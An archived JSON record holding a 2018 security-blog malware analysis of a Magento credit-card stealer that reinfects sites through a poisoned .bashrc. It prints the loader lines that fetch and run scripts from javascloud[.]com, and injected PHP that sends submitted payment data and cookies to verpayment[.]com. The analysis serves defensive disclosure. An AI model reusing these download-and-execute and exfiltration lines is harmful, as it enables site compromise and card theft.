{
	"id": "79867782-3d27-464e-af46-f16c58ca9ac0",
	"created_at": "2026-04-06T00:06:55.641076Z",
	"updated_at": "2026-04-10T03:21:44.096215Z",
	"deleted_at": null,
	"sha1_hash": "6feca9b111c2235f2aa6316d08eb146a7ec8db21",
	"title": "Shell Logins as a Magento Reinfection Vector",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 84658,
	"plain_text": "Shell Logins as a Magento Reinfection Vector\r\nBy Cesar Anjos\r\nPublished: 2018-05-31 · Archived: 2026-04-05 16:39:58 UTC\r\nRecently, we have come across a number of websites that were facing reinfection of a credit card information\r\nstealer malware within the following files:\r\napp/Mage.php;\r\nlib/Varien/Autoload.php;\r\nindex.php;\r\napp/code/core/Mage/Core/functions.php;\r\nThese are common files for attackers to target as they operate throughout Magento sites, but these instances were\r\nspecial as they had a very peculiar reinfection rate.\r\nMalicious Scripts Loaded Through .bashrc\r\nUpon closer inspection, we came across this snippet in the site owner’s .bashrc file. A .bashrc file is a script that\r\nloads whenever a user logs into his *nix account locally or through SSH. As seen below, any command can be\r\nadded there:\r\n# .bashrc\r\n# Source global definitions\r\nif [ -f /etc/bashrc ]; then\r\nhttps://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html\r\nPage 1 of 4\n\n. /etc/bashrc\r\nfi\r\n# Uncomment the following line if you don't like systemctl's auto-paging feature:\r\n# export SYSTEMD_PAGER=\r\n# User specific aliases and functions\r\nchecks=$(ps aux | grep php-fpm | grep -v grep | grep tmp);\r\nif [ \"$checks\" == \"\" ]; then\r\n rm -rf /tmp/.a /tmp/start_6457387765553057055;\r\n if ! [ -f /tmp/php-fpm ]; then\r\n curl -qs javascloud[.]com/victim_install.js \u003e /tmp/php-fpm;\r\n chmod +x /tmp/php-fpm;\r\n fi\r\n /bin/sh /tmp/php-fpm \u003e /dev/null 2\u003e\u00261 \u0026\r\nFi\r\nOne point worth noting is that the name of file being pulled (victim_install.js) varies depending on the target,\r\nwhere victim is the domain name of the victim’s site.\r\nFor a quick rundown of what is going on, each time the server account owner logs in and an interactive shell\r\nsession starts, the file javascloud[.]com/victim_install.js is fetched and put onto /tmp/php-fpm which is then\r\nexecuted.\r\nInfected Files and Credit Card Stealers\r\nHere’s an example of the content in the javascloud[.]com/victim_install.js file:\r\nhttps://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html\r\nPage 2 of 4\n\n#!/bin/bash\r\nif [ -f /tmp/.a ]; then\r\n exit;\r\nfi\r\ntouch /tmp/.a\r\nif ! [ -f /tmp/zend_cache---Zend_LocaleC_en_US_bb ]; then\r\n curl -q javascloud[.]com/victim_daemon.js \u003e /tmp/zend_cache---Zend_LocaleC_en_US_bb\r\nfi\r\nphp -f /tmp/zend_cache---Zend_LocaleC_en_US_bb\r\nsleep 60\r\nrm -rf /tmp/.a\r\n/bin/sh /tmp/php-fpm \u003e /dev/null 2\u003e\u00261 \u0026\r\nexit;\r\nAs you can see, another file is being obtained javascloud[.]com/victim_daemon.js and placed onto\r\n/tmp/zend_cache—Zend_LocaleC_en_US_bb, which is then executed through php binary.\r\nThis last file is the final step that brings the credit card stealer onto the website and is used to infect the files\r\nmentioned at the top.\r\nFrom this last file we can see the indicators of what files and areas the infection is targeting:\r\n$fileList = array('app/Mage.php','lib/Varien/Autoload.php','index.php','app/code/core/Mage/Core/funct\r\n$patternSearchFile = array('Varien_Autoload::register();','class Varien_Autoload', 'umask(0);', 'func\r\nOnce a pattern matches, the following code is injected into that location:\r\nif (preg_match(\"/\".base64_decode('Zmlyc3RuYW1lfGN2YzJ8Y2NfbnVtYmVyfHVzZXJuYW1lfGNjX3xzaGlwcGluZ3xjdnZ\r\n@exec(\"curl --data \\\"version=1\u0026encode=\".base64_encode( serialize($_POST) . \"--\" . serialize($_COOK\r\nThis is it now as a decoded version:\r\nAll the confidential payment information inputted on the website is submitted to\r\nhttp://verpayment[.]com/testServer.php.\r\nConclusion\r\nhttps://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html\r\nPage 3 of 4\n\nThis may not be a very common reinfection method, but it is effective when the only available mechanism to\r\nmanage the files is SFTP. It is extremely uncommon to see site reinfections triggered just by starting an interactive\r\nshell session. However, this is what the malicious code in the .bashrc does, and the file is executed whenever a site\r\nowner logs into their server account using SSH or SFTP. This file is typically located above the root directory of\r\nthe site. Moreover, it is “hidden” and FTP managers don’t show it by default. Even the “ls” command requires an\r\nadditional “-a” flag to show such files.\r\nWhen dealing with website malware, we need to keep in mind that not only the website files/database can contain\r\nmalware, any part of the chain – from the server config down to the website – are a point of risk.\r\nThe best way to mitigate this type of infection is to properly secure your SSH account and improve your security\r\nposture. If you believe that your Magento website has been compromised or you are struggling with website\r\nreinfections, we can help.\r\nUpdate: We have just released a Magento security guide. Check it out!\r\nCesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities\r\ninclude keeping up with the latest malware and writing about it. His professional experience covers over five years\r\nin the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him\r\non our Twitter.\r\nRelated Tags\r\nBlack Hat Tactics,\r\nHacked Websites\r\nSource: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html\r\nhttps://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html"
	],
	"report_names": [
		"shell-logins-as-a-magento-reinfection-vector.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434015,
	"ts_updated_at": 1775791304,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6feca9b111c2235f2aa6316d08eb146a7ec8db21.pdf",
		"text": "https://archive.orkl.eu/6feca9b111c2235f2aa6316d08eb146a7ec8db21.txt",
		"img": "https://archive.orkl.eu/6feca9b111c2235f2aa6316d08eb146a7ec8db21.jpg"
	}
}